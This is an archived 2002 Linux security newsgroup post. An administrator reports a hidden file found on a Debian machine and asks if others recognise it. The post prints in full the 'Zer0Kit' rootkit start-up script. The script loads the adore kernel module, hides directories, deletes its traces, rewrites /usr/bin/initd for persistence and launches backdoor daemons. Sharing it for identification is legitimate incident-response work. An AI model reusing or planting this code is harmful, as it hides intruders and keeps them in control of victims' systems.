URGENT: Zer0Kit start-up script by Virus (Virusel,Viruzzel)

From: Adam Adam (adam@adam.org)
Date: 03/29/02

• Next message: Bryan Packer: "Re: iptables problems"
• Previous message: Heinz Ekker: "Re: linux box compromised: advice needed"
• Next in thread: None: "Re: URGENT: Zer0Kit start-up script by Virus (Virusel,Viruzzel)"
• Reply: None: "Re: URGENT: Zer0Kit start-up script by Virus (Virusel,Viruzzel)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: Adam Adam <adam@adam.org>
Date: Thu, 28 Mar 2002 21:27:45 -0500

This showed up as a hidden file on a debian/potato machine under
/usr/bin/initd.

ls would not show the file but cat and file did. Has anyone seen this
before?

\#!/bin/bash
#
# Zer0Kit start-up script by Virus (Virusel,Viruzzel) [:P
#
dr=/dev/rd/.~
PATH=/bin:$dr:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH
cd $dr/
/sbin/depmod -a &>/dev/null
/sbin/insmod -f adore.o &>/dev/null
T=`lsmod | grep "adore"`
if [ ! "$T" ]; then
./muje &>/dev/null
./mujego &>/dev/null
if [ -e adore.o ]; then
echo &>/dev/null
else
     ./mujego2 &>/dev/null
     if [ -e adore.o ]; then
     echo &>/dev/null
     else
         tar zxf kukuold &>/dev/null
         ./muje &>/dev/null
         ./mujego &>/dev/null
         if [ -e adore.o ]; then
         echo &>/dev/null
         else
             ./mujego2 &>/dev/null
             if [ -e adore.o ]; then
             echo &>/dev/null
             else
             echo &>/dev/null
             rm -f *.c *.o *.h muje* ava
             rm -rf /usr/bin/initd &>/dev/null
             echo "#!/bin/sh" >/usr/bin/initd
             echo "if [ -e /usr/X11R6/bin/.~/rhnsd/rhnsd ]; then"
>>/usr/bin/initd
             echo "cd /usr/X11R6/bin/.~/rhnsd/ ; ./rhnsd &>/dev/null"
>>/usr/bin/initd
             echo "fi" >>/usr/bin/initd
             echo >>/usr/bin/initd
             chmod +x >>/usr/bin/initd
             fi
         fi
     fi
fi
else
     if [ -e cleaner.o ];
         then
         /sbin/insmod -f cleaner.o &>/dev/null
         /sbin/rmmod cleaner
         $dr/ava h /usr/X11R6/bin/.~/ &>/dev/null
         $dr/ava h /usr/local/man/man9 &>/dev/null
         $dr/ava h /usr/bin/initd &>/dev/null
         fi
     if [ -e modhide.o ];
         then
         /sbin/insmod -f modhide.o &>/dev/null
         /sbin/rmmod modhide
         $dr/ava h /usr/X11R6/bin/.~/ &>/dev/null
         $dr/ava h /usr/local/man/man9/ &>/dev/null
         $dr/ava h /usr/bin/initd &>/dev/null
     fi
fi
if [ -e /usr/X11R6/bin/.~/rhnsd/rhnsd ]; then
cd /usr/X11R6/bin/.~/rhnsd/ ; ./rhnsd &>/dev/null
fi
if [ -e /usr/X11R6/bin/.~/labutza/rhnsd ]; then
cd /usr/X11R6/bin/.~/labutza/ ; ./rhnsd &>/dev/null
fi
killall -666 rhnsd &>/dev/null
cd /
#
# DONE !!! this is the lamest script ever!!! don't use it!!! ...bwuhahahaha
#
/sbin/apmd -p 7070
killall -666 apmd

---

• Next message: Bryan Packer: "Re: iptables problems"
• Previous message: Heinz Ekker: "Re: linux box compromised: advice needed"
• Next in thread: None: "Re: URGENT: Zer0Kit start-up script by Virus (Virusel,Viruzzel)"
• Reply: None: "Re: URGENT: Zer0Kit start-up script by Virus (Virusel,Viruzzel)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Newsgroups  > comp.os.linux.security  > 2002-03